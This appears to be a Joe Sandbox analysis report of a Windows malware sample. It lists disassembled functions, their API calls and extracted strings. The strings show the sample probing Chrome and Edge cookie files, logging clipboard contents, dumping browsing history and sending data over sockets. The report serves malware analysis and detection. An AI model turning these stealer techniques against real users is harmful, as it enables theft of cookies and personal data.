                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                  • __freea.LIBCMT ref: 0045129D
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                  • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                  APIs
                                                    • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                    • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                    • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                  • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQuerySleepValue
                                                  • String ID: 86l$8SG$exepath$xdF
                                                  • API String ID: 4119054056-3164465272
                                                  • Opcode ID: abb323afdf3d65a8fcb9fe28f99c1048d11d133e5e733d2859862f82a45f57bd
                                                  • Instruction ID: 51bf296395b05d3efeb7b41814c334b1d8e13e95dfba71b8de44539041ec8c28
                                                  • Opcode Fuzzy Hash: abb323afdf3d65a8fcb9fe28f99c1048d11d133e5e733d2859862f82a45f57bd
                                                  • Instruction Fuzzy Hash: 3521F4A1B003042BD604B6365D4AAAF724D8B80318F40897FBA56E72D3DFBC9D45826D
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                  • _free.LIBCMT ref: 0044F43F
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                  • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                  • _free.LIBCMT ref: 00448353
                                                  • _free.LIBCMT ref: 0044837A
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                  • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpen$FileImageName
                                                  • String ID:
                                                  • API String ID: 2951400881-0
                                                  • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                  • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                  APIs
                                                  • _free.LIBCMT ref: 00450A54
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450A66
                                                  • _free.LIBCMT ref: 00450A78
                                                  • _free.LIBCMT ref: 00450A8A
                                                  • _free.LIBCMT ref: 00450A9C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                  • String ID: XQG$`m$NG
                                                  • API String ID: 1634807452-1762706703
                                                  • Opcode ID: b2f0490ca4864a8eb0c48cf3396b1e76e79b9ec5dea5ad29cd1735cca7dae2b3
                                                  • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                  • Opcode Fuzzy Hash: b2f0490ca4864a8eb0c48cf3396b1e76e79b9ec5dea5ad29cd1735cca7dae2b3
                                                  • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: /sort "Visit Time" /stext "$0NG
                                                  • API String ID: 368326130-3219657780
                                                  • Opcode ID: dfd66daedff1ed465f69e1ec25a1149862e16772085409376d3f26b1d972e468
                                                  • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                  • Opcode Fuzzy Hash: dfd66daedff1ed465f69e1ec25a1149862e16772085409376d3f26b1d972e468
                                                  • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                    • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                    • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                  • _free.LIBCMT ref: 0044F050
                                                  • _free.LIBCMT ref: 0044F086
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast_abort
                                                  • String ID: hOl$hOl
                                                  • API String ID: 2991157371-3716686657
                                                  • Opcode ID: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                  • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                  • Opcode Fuzzy Hash: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                  • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: [End of clipboard]$[Text copied to clipboard]$xdF
                                                  • API String ID: 1881088180-1310280921
                                                  • Opcode ID: 817b4c01eafabb62cefe08f25f435df96e29b2123a05dda1d2c5d8970e98f987
                                                  • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                  • Opcode Fuzzy Hash: 817b4c01eafabb62cefe08f25f435df96e29b2123a05dda1d2c5d8970e98f987
                                                  • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00416330
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen$CloseCreateValue
                                                  • String ID: !D@$`m$okmode
                                                  • API String ID: 3411444782-2895015587
                                                  • Opcode ID: 32b767abda9d74a658984582e830535edcfbd4fa180c3dcb91f0b96cbdeabe52
                                                  • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                  • Opcode Fuzzy Hash: 32b767abda9d74a658984582e830535edcfbd4fa180c3dcb91f0b96cbdeabe52
                                                  • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                  APIs
                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: 2a38480921e4d6be1d5b2529be3b715cdf247bf3a0a1df31f1585b54042120b5
                                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                  • Opcode Fuzzy Hash: 2a38480921e4d6be1d5b2529be3b715cdf247bf3a0a1df31f1585b54042120b5
                                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                  APIs
                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: 48aa145b66dc80a11566b4620fdd9ce13eae5fb2ee34664654c02424daf75182
                                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                  • Opcode Fuzzy Hash: 48aa145b66dc80a11566b4620fdd9ce13eae5fb2ee34664654c02424daf75182
                                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                  • wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                  • API String ID: 1497725170-1359877963
                                                  • Opcode ID: 3915eab654d502a94c5a300c40617f2f32f6303039d7969e722e20a12c8e19e4
                                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                  • Opcode Fuzzy Hash: 3915eab654d502a94c5a300c40617f2f32f6303039d7969e722e20a12c8e19e4
